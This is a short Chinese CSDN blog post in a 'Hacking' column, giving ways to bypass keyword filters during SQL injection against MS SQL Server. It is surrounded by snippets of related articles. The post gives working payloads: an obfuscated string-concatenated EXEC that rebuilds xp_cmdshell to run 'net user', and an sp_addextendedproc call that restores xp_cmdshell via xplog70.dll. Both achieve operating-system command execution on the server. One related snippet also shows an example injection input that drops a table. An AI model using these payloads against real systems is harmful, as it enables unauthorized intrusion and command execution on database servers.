MS SQL注入碰到关键词被过滤后的解决思路

最新推荐文章于 2024-05-02 01:04:40 发布
最新推荐文章于 2024-05-02 01:04:40 发布
阅读量1k 收藏
点赞数
分类专栏: Hacking 文章标签: sql insert xp user
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6753125
版权

declare、xp_、sp_、select、update、insert等关键词被过滤了。幸好单引号没有过滤。

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')

当xp_被过滤了,declare也被过滤了。什么鸟关键字都被过滤了。试试下面的办法。

EXEC master.dbo.sp_addextendedproc 'abc','xplog70.dll'


7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
免费开源的SQL注入工具SQLmap.zip
07-18
SQL注入的成功必须借助应用程序的安全漏洞,例如用户输入没有经过正确地过滤(针对某些特定字符串)或者没有特别强调类型的时候,都容易造成异常地执行SQL语句。SQL注入是网站渗透中最常用的攻击技术,但是其实SQL...
SQL注入:关键字过滤
quan610232785的博客
11-18 2338
SQL注入:关键字过滤sql参数过滤逻辑代码 sql参数过滤 对网络上普遍的都是直接对关键字进行替换,是实际上mysql关键字不区分大小写,在sql执行中,select、SELECT、Select的效果是一致的。网络上的普遍过滤效果不佳,自己写了一个工具类进行过滤。 逻辑 关键字前后有空格才算是有效待过滤的,以防过滤正常的参数 通过全部小写进行匹配,匹配后通过获得下标 通过下标以及匹配的关键对传入的参数进行下标用空格替换 去除前后空格 代码 package com.platform.common.uti
过滤关键字大全-网页关键字过滤-sql注入关键字过滤
eee365的专栏
08-30 1196
using System;using System.Collections.Generic;using System.Text;using System.Text.RegularExpressions;using System.Web;using System.Security.Cryptography;public class Input{
sql注入原理
嘻嘻哈哈
02-23 2847
0x01sql注入原理 sql注入漏洞产生的原理是因为服务器对用户输入参数过滤不严格,将含有恶意代码的参数代入数据库查询语句中并执行。 0x02sql注入中常用的函数与语法 Group_concat():将select的查询结果全部显示出来,占一个显示位 select version():查询MySQL版本 select user():查询数据库用户名 select databas...
SQL注入一些过滤及绕过总结
热门推荐
weixin_44300286的博客
07-20 1万+
前言: 前几天做了几道SQL注入的题,一上去就遇到这样那样的过滤,弄得我很难受,所以这里写一篇关于过滤一些的总结。 1、过滤关键字 过滤关键字应该是最常见的过滤了,因为只要把关键字一过滤,你的注入语句基本就不起作用了。 绕过方法: (1)最常用的绕过方法就是用/**/,<>,分割关键字 sel<>ect sel/**/ect (2)根据过滤程度,有时候还可以用双写绕过 s...
sql注入过滤select_网站SQL注入渗透测试手法介绍
weixin_39628384的博客
11-26 1921
国庆即将到来,前一期讲到获取网站信息判断所属环境以及各个端口的用处和弱口令密码利用方法,这期仍有很多客户找到我们想要了解针对于SQL注入攻击的测试方法,这一期我们来讲解下注入的攻击分类和使用手法,让客户明白漏洞是如何产生的,会给网站安全带来怎样的影响!3.1 SQL注入漏洞3.1.1. 注入分类SQL注入是一种代码注入技术,用于攻击数据驱动的应用程序。在应用程序中,如果没有做恰当的过滤,则可能使得...
穿山甲pangolinSQL注入工具
11-05
4、最大化的Union操作能够极大的提高SQL注入操作速度。 5、代理支持,注入站(点)管理功能。 6、预登陆功能,在需要验证的情况下照样注入。 7、自定义HTTP标题头功能。 8、丰富的绕过防火墙过滤功能。 9、支持HTTPS...
程序员的SQL金典4-8
05-20
 10.1.1 SQL注入漏洞原理  10.1.2 过滤敏感字符  10.1.3 使用参数化SQL  10.2 SQL调优  10.2.1 SQL调优的基本原则  10.2.2 索引  10.2.3 全表扫描和索引查找  10.2.4 优化手法  10.3 事务  10.3.1 事务...
程序员的SQL金典.rar
03-29
 10.1.1 SQL注入漏洞原理  10.1.2 过滤敏感字符  10.1.3 使用参数化SQL  10.2 SQL调优  10.2.1 SQL调优的基本原则  10.2.2 索引  10.2.3 全表扫描和索引查找  10.2.4 优化手法  10.3 事务  10.3.1 事务...
程序员的SQL金典7-8
05-20
 10.1.1 SQL注入漏洞原理  10.1.2 过滤敏感字符  10.1.3 使用参数化SQL  10.2 SQL调优  10.2.1 SQL调优的基本原则  10.2.2 索引  10.2.3 全表扫描和索引查找  10.2.4 优化手法  10.3 事务  10.3.1 事务...
SQL Server的基本操作示例
weixin_58566539的博客
04-29 507
SQL Server的基本操作示例
常用SQL命令
最新发布
wenxiaoba的博客
05-02 930
常用SQL语句使用说明和示例
攻防演练作为红方:postgresql提权之UDF提权 ,及其好用的工具
keyboard专栏
04-28 497
在 PostgreSQL 中,用户定义的函数(UDF)提权是一种常见的提升权限的方法,尤其是当你已经获得了数据库的访问权限但需要更高级别系统权限时。UDF 提权涉及在数据库中创建或使用函数,这些函数可以执行系统级别的命令,从而允许攻击者在数据库服务器上执行任意代码。
SQL底层执行过程
qq_14886109的博客
04-28 910
SQL底层执行过程,INNODB,二阶段提交
优化SQL的方法
weixin_44139651的博客
04-26 1478
使用join实现,但不适合join太多表,阿里巴巴开发者手册的规定,join表的数量不应该超过3个,join表数量太多时,会导致mysql在选错索引。一般SQL优化第一考虑的是索引优化,可使用explain命令,查看MySQL的执行计划,确认SQL是否有走索引。相对连接查询,子查询使用in关键字实现,具有结构化,相对简单,但是需要创建和删除临时表,增加资源消耗。索引可提升SQL效率,但索引需要额外的存储空间,而且还会有一定的性能消耗。left join,两个表的交集,以及左表剩余的数据,左表为驱动表。
SQL Server】入门教程-基础篇(二)
m0_74229735的博客
04-29 841
本章要讲的就是Sql Server的高级语言,还有后续。
PostgreSQL 怎么查看记录数据的查看或者变更的数据库日志
keyboard专栏
04-28 656
在 PostgreSQL 中,可以通过多种方式配置和查看记录数据变更或查询的日志。
SQL】ACID事务与隔离级别
KX_52517的博客
04-29 938
本文是对数据库事务acid特性和隔离级别的介绍。
SQL LPAD函数使用
sxk1101的博客
04-29 418
Oracle SQL 中的LPAD函数是一个用于格式化字符串的函数,它会在给定字符串的左侧填充指定的字符,直到字符串达到指定的长度。这个函数在数据库查询中非常有用,尤其是在需要对输出进行格式化时,比如在报表中。
springboot sql注入拦截
07-25
在Spring Boot中,可以通过使用预编译语句或使用参数绑定的方式来防止SQL注入攻击。以下是一些常见的防止SQL注入的方法: 1. 使用预编译语句:使用预编译语句可以将参数值与SQL语句进行分离,从而防止恶意输入被解释为SQL代码。预编译语句会将参数值作为参数传递给数据库,而不是将其拼接到SQL语句中。这可以防止SQL注入攻击。 例如,使用JdbcTemplate执行SQL查询时,可以使用预编译语句,如下所示: ```java String sql = "SELECT * FROM users WHERE username = ?"; String username = "admin'; DROP TABLE users;--"; // 恶意输入 List<User> users = jdbcTemplate.query(sql, new Object[]{username}, new BeanPropertyRowMapper<>(User.class)); ``` 2. 使用参数绑定:Spring Boot的JPA(Java Persistence API)提供了一种更高级的方式来处理SQL查询。通过使用参数绑定,可以将输入值直接绑定到查询方法的参数上,而不是将其拼接到SQL语句中。这样可以避免SQL注入攻击。 例如,使用Spring Data JPA时,可以定义一个查询方法,如下所示: ```java @Repository public interface UserRepository extends JpaRepository<User, Long> { @Query("SELECT u FROM User u WHERE u.username = :username") User findByUsername(@Param("username") String username); } ``` 在这个例子中,`:username` 是一个命名参数,它将被绑定到方法的参数 `@Param("username")` 上。这样,无论用户输入什么内容,都不会导致SQL注入攻击。 总的来说,使用预编译语句或参数绑定是防止SQL注入攻击的有效方法。同时,还应遵循最佳实践,如限制用户输入的长度、类型验证、对输入进行转义等。此外,还可以使用安全框架或防火墙来增强应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值